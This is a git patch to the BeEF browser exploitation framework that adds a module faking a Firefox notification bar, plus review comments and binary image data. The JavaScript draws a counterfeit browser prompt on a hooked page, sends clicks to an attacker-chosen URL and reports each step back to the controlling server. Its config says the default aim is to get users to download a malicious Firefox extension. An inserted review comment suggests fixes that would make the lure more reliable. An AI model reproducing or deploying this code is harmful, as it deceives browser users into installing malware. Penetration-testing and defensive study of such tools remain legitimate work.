From b16d7e3563443678149bdaf91bca9d78c5815909 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Thu, 4 Jul 2013 23:12:01 +0930
Subject: [PATCH] Add fake_notification_ff module Rename fake_notification module to fake_notification_ie
---
.../fake_notification_ff/command.js | 36 ++++++++++++++++++
.../fake_notification_ff/config.yaml | 15 ++++++++
.../fake_notification_ff/img/install.png | Bin 0 -> 2092 bytes
.../fake_notification_ff/img/jigsaw.png | Bin 0 -> 802 bytes
.../fake_notification_ff/img/plugins.png | Bin 0 -> 13781 bytes
.../fake_notification_ff/module.rb | 32 ++++++++++++++++
.../command.js | 0
.../config.yaml | 6 +--
.../module.rb | 4 +-
9 files changed, 88 insertions(+), 5 deletions(-)
create mode 100644 modules/social_engineering/fake_notification_ff/command.js
create mode 100644 modules/social_engineering/fake_notification_ff/config.yaml
create mode 100644 modules/social_engineering/fake_notification_ff/img/install.png
create mode 100644 modules/social_engineering/fake_notification_ff/img/jigsaw.png
create mode 100644 modules/social_engineering/fake_notification_ff/img/plugins.png
create mode 100644 modules/social_engineering/fake_notification_ff/module.rb
rename modules/social_engineering/{fake_notification => fake_notification_ie}/command.js (100%)
rename modules/social_engineering/{fake_notification => fake_notification_ie}/config.yaml (64%)
rename modules/social_engineering/{fake_notification => fake_notification_ie}/module.rb (86%)
diff --git a/modules/social_engineering/fake_notification_ff/command.js b/modules/social_engineering/fake_notification_ff/command.js
new file mode 100644
index 000000000..5bb0b7744
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/command.js
@@ -0,0 +1,36 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var id = beef.dom.generateID();
+ var pid = beef.dom.generateID();
+ var zztop = beef.dom.getHighestZindex()+1;
+ var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:0px 20px 0px 20px; z-index:'+zztop+'; border-bottom:1px solid black; background:#fbe99a; display:none;'});
+ var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,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);'});
+ var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+ var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+ $j('body').append(el);
+ var hid = '#'+id;
+ var hpid = '#'+pid;
+ $j(hid).append(elp);
+ $j(hpid).html("<%= @notification_text %> ");
+ $j(hid).append(ell);
+ //$j(hid).append("Problems installing? ");
+ $j(hid).append(elr);
+ $j(hid).click(function() {
+ $j(this).slideUp(300,function() {
+ $j(this).remove();
+ });
+ window.location = '<%= @url %>';
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+ });
+ $j(hid).css('cursor','pointer');
+ $j(hid).slideDown(300,function() {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+ });
+
+});
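Review bot: `<%= @notification_text %>` and `<%= @url %>` are spliced into JavaScript string literals without escaping, so a quote, backslash or newline in either option produces a script that no longer parses; the IE module's default text later in this commit hand-escapes its quotes (`\\'Java\\'`), which suggests the template leaves escaping to whoever fills in the option. Emitting the values as JSON literals from the template would remove that dependency, e.g. `window.location = <%= @url.to_json %>;`, assuming `to_json` is available in the ERB context, which the hunk does not show. The text also goes through `.html()`, so any markup in the option is rendered; if plain text is what is meant, `.text()` says so. The commented-out `//$j(hid).append("Problems installing? ");` line and the missing semicolon after the `elr` declaration should be cleaned up, and the three PNGs added under `img/` are not referenced by this file, which embeds its images as data: URIs.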
diff --git a/modules/social_engineering/fake_notification_ff/config.yaml b/modules/social_engineering/fake_notification_ff/config.yaml
new file mode 100644
index 000000000..a501a37aa
--- /dev/null
+++ b/modules/social_engineering/fake_notification_ff/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ fake_notification_ff:
+ enable: true
+ category: "Social Engineering"
+ name: "Fake Notification Bar (Firefox)"
+ description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+ authors: ["xntrik", "bcoles"]
+ target:
+ user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification_ff/img/install.png b/modules/social_engineering/fake_notification_ff/img/install.png new file mode 100644 index 0000000000000000000000000000000000000000..fb44d07a6da326a5269428b69ac72899ad577768 GIT binary patch literal 2092 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 literal 0 HcmV?d00001 
diff --git a/modules/social_engineering/fake_notification_ff/img/plugins.png b/modules/social_engineering/fake_notification_ff/img/plugins.png new file mode 100644 index 0000000000000000000000000000000000000000..73104156c742966853058a9c47108f31cfa10d59 GIT binary patch literal 13781 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 z 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 